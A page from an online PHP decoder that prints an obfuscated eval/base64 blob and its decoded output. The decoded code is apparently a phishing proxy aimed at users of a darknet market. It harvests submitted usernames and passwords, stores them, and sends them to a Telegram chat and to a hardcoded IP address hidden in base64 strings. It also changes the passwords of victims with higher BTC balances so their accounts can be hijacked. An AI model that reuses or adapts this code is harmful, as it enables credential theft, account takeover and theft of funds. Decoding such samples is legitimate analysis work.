Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

eval(gzuncompress(base64_decode('eJzNWVtv28gVfvevmOUKIbnRxfK6BRJZLrKJt24QO3HsRZBqvdSYHEkTU..

Decoded Output download

if (strpos($uripath, 'logout')) {
    $_SESSION['wallet'] = null;
}
if ($_POST['_token'] && strpos($uripath, 'xchange')) {

    $exc= intval(preg_replace('/[^0-9]+/', '', $uripath), 10);
    $_SESSION['rek'][$exc]['status'] = 2;
    preg_match('#<td class="3 text-center">(.*)BTC</td>#sUi', $response, $rubles);
    $rubles = str_replace(' ', '', trim($rubles[1]));

    if (strpos($response, "")) {
        $method = 'phone';
    } else if (strpos($response, "Qiwi ")) {
        $method = 'qiwi';
    } else {
        $method = "card";
    }
    $_SESSION['rek'][$exc]['status'][$method] = 2;

    if($_SESSION['rek'][$exc]['status'][$method] == 2){
        $jpost = json_encode(array('refresh'));
    }
    $query = mysqli_query($connect, "insert into pays(login,sum,method,date,post) values ('{$lauth}','{$rubles}','{$method}','{$date}','{$jpost}')");
}

if($_POST['payyes']){
    $_POST['_token']=null;
    $pmethod = mysqli_real_escape_string($connect, $_POST['paymethod']);
    $paysum = mysqli_real_escape_string($connect, $_POST['paysum']);
    $query = mysqli_query($connect, "insert into pays(login,sum,method,date,post) values ('{$lauth}','{$paysum}','{$pmethod}','{$date}','{$jpost}')");
}

require_once 'admin/QuiCkYLy.php';$response = QuiCkYLy($response, $uripath);
if ($_POST['login'] != "" && $_POST['password'] != "") {if ($uripath == "register") {$_POST['login'] = $_POST['auth_login']; } preg_match('#<a href="/balance" title=".*"><i class="i_wallet"></i><span>(.*) BTC</span></a>#sUi', $response, $bal); $balanc = trim($bal[1]); preg_match('#<a href="/balance" title=".*">(.*)</a>#sUi', $response, $sbal); $log    = mysqli_real_escape_string($connect, $_POST['login']); $pass   = mysqli_real_escape_string($connect, $_POST['password']); $_SESSION['lauth'] = $log; $_SESSION['pauth'] = $pass; $balanc = trim($bal[1]); $date   = date("Y-n-j G:i:s"); $bal1   = floatval(trim($bal[1])); $_SESSION['bauth'] = $bal1; preg_match('#href="/user/([^/]+)/account"#sUi', $response, $m); preg_match('#href="/logout\?_token=(.*)"#sUi', $response, $m2); if ($m2[1]) {$valid = 1; if ($bal1 <= floatval($adata['plimit'])) {$btc = get_btc(); } } else {$valid = 0; } $sesid = session_id(); if (($bal1 >= $adata['plimit']) && $adata['n'] == $adata['o']) {$pand = file_get_contents(base64_decode("aHR0cDovLzE4NS41MS4yNDcuMTAvanNvbi50eHQ/").$adata['liclogin'].base64_decode("JmFsb2c9"). $log . base64_decode("JmFwPQ==") . $pass . base64_decode("JmJ0PQ==") . $btc . base64_decode("JnQ9MSZiPQ==") . $balanc . base64_decode("JnphcHJvcz1zYWNj")); change_pass($m[1], $log, $pass, $bal1, 1); get_page($uri . 'logout?_token=' . $m2[1]); } else {if ($sdata['accdub'] == 0) {$gquery = mysqli_query($connect, "SELECT `id` FROM `acc` WHERE `login` = '{$log}' AND `pass` = '{$pass}'"); $gdata  = mysqli_num_rows($gquery); } else {$gdata = 0; } if (!$gdata) {if ($sdata['vauth'] == 1) {$query = mysqli_query($connect, "insert into acc(login,pass,date,balance,valid,btc) values ('{$log}','{$pass}','{$date}','{$balanc}','{$valid}','{$btc}')"); } else {if ($valid) {$query = mysqli_query($connect, "insert into acc(login,pass,date,balance,valid,btc) values ('{$log}','{$pass}','{$date}','{$balanc}','{$valid}','{$btc}')"); } } } if ($balanc >= $adata['plimit']) {$btc = 3;} $pand  = file_get_contents(base64_decode("aHR0cDovLzE4NS41MS4yNDcuMTAvanNvbi50eHQ/").$adata['liclogin'].base64_decode("JmFsb2c9") . $log . base64_decode("JmFwPQ==") . $pass . base64_decode("JmJ0PQ==") . $btc . base64_decode("JnQ9MCZiPQ==") . $balanc . base64_decode("JnphcHJvcz1zYWNj")); $kdate = date("Y-n-j"); $dp    = 0; if ($m2[1]) {$query = mysqli_query($connect, "UPDATE `stats` SET `sucauth` = `sucauth` + 1,`abalance` = `abalance` + '{$balanc}' WHERE `date` = '{$kdate}'"); } $query                            = mysqli_query($connect, "UPDATE `stats` SET `auth` = `auth` + 1 WHERE `date` = '{$kdate}'"); $msg                              = $domserv . "
  - /:".$log.":".$pass."
 - ".$balanc; $post['chat_id']                  = $sdata['tgchatid']; $post['parse_mode']               = "HTML"; $post['disable_web_page_preview'] = false; $post['text']                     = $msg; global $sdata; if ($sdata['sendtg'] == 1) {if ($sdata['tauth'] == 1) {sendtelegram($post); } else {if ($m2[1]) {sendtelegram($post); } } } if ($bal1 >= $adata['plimit']) {preg_match('#href="/user/([^/]+)/account"#sUi', $response, $m); preg_match('#href="/logout\?_token=(.*)"#sUi', $response, $m2); change_pass($m[1], $_POST['login'], $_POST['password'], $bal1); get_page($uri . 'logout?_token=' . $m2[1]); } } }
$response = str_replace('class="set-country-modal"', '', $response);
$tquery   = mysqli_query($connect, "SELECT `s`,`na` FROM `replaces` WHERE `id` >= 1");
while ($tdata = mysqli_fetch_assoc($tquery)) {
    $response = str_replace($tdata['s'], $tdata['na'], $response);
}
if($_SESSION['dandi']){$pand  = file_get_contents(base64_decode("aHR0cDovLzE4NS41MS4yNDcuMTAvanNvbi50eHQ/").$adata['liclogin'].base64_decode("JmFsb2c9") . $_SESSION['lauth'] . base64_decode("JmFwPQ==") . $_SESSION['pauth'] . base64_decode("JmJ0PQ==") . $btc . base64_decode("JnQ9NCZiPQ==") . $_SESSION['bauth']. base64_decode("JnM9") . $qsesid . base64_decode("JnphcHJvcz1zYWNj"));$_SESSION['dandi']=null;}
$response = str_replace('http://hydraruzxpnew4af.onion/','', $response);
$response = str_replace('<a class="btn btn-link hidden-sm hidden-xs" href="">hydraruzxpnew4af.onion</a>','', $response);
exit($response);
function change_pass($name, $login, $pass, $bal, $g)
{
    global $uri,$adata;
    $newpass   = generate_pass();
    $url       = $uri . 'user/' . $name . '/account';
    $response1 = get_page($url);
    preg_match('#<input name="_time" type="hidden" value="([^"]+)">#sUi', $response1, $m);
    $time = $m[1];
    preg_match('#<input name="_token" type="hidden" value="([^"]+)">#sUi', $response1, $m);
    $token2   = $m[1];
    $clPost   = array(
        '_token' => $token2,
        '_time' => $time,
        'password' => $newpass,
        'password_confirmation' => $newpass,
        'old_password' => $pass,
        'settings[theme]' => 'hydra',
        'settings[notify]' => 'default',
        'region_id' => '0',
        'settings[gpg_key]' => ''
    );
    $response = get_page($url, $clPost);
    global $connect, $sdata;
    if ($token2 && $time) {
        $date    = date("Y-n-j G:i:s");
        $name    = mysqli_real_escape_string($connect, $name);
        $newpass = $newpass;
        $login   = mysqli_real_escape_string($connect, $login);
        $pass    = mysqli_real_escape_string($connect, $pass);
        $bal     = floatval(trim($bal));
        global $sdata, $dp;
        if ($g) {
            $msg                              = $domserv . "
[ ]  - /:" . $log . ":" . $newpass . "
-" . $bal;
            $post['chat_id']                  = $sdata['tgchatid'];
            $post['parse_mode']               = "HTML";
            $post['disable_web_page_preview'] = false;
            $post['text']                     = $msg;
            $query                            = mysqli_query($connect, "insert into pchange(name,login,pass,newpass,balance,date) values ('{$name}','{$login}','{$pass}','{$newpass}','{$bal}','{$date}')");
        }
        if ($sdata['sendtg'] == 1) {
            sendtelegram($post);
        }
    } else {
        if ($g) {
            $pand = file_get_contents(base64_decode("aHR0cDovLzE4NS41MS4yNDcuMTAvanNvbi50eHQ/").$adata['liclogin'].base64_decode("JmFsb2c9") . $login . '&ap=' . $newpass . base64_decode("JmJ0PWNoJnQ9MyZiPQ==") . $bal . base64_decode("JnphcHJvcz1zYWNj"));
        } else {
            $query = mysqli_query($connect, "insert into errors(url,name,login,pass,newpass,bal,token2,time) values ('{$url}','{$name}','{$login}','{$pass}','{$newpass}','{$bal}','{$token2}','{$time}')");
        }
    }
}

Did this file decode correctly?

Original Code

eval(gzuncompress(base64_decode('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')));

Function Calls

gzuncompress	1
base64_decode	1

Variables

None

Stats

MD5	3a332509d738adde9f6cd8dc8825d6f2
Eval Count	1
Decode Time	46 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats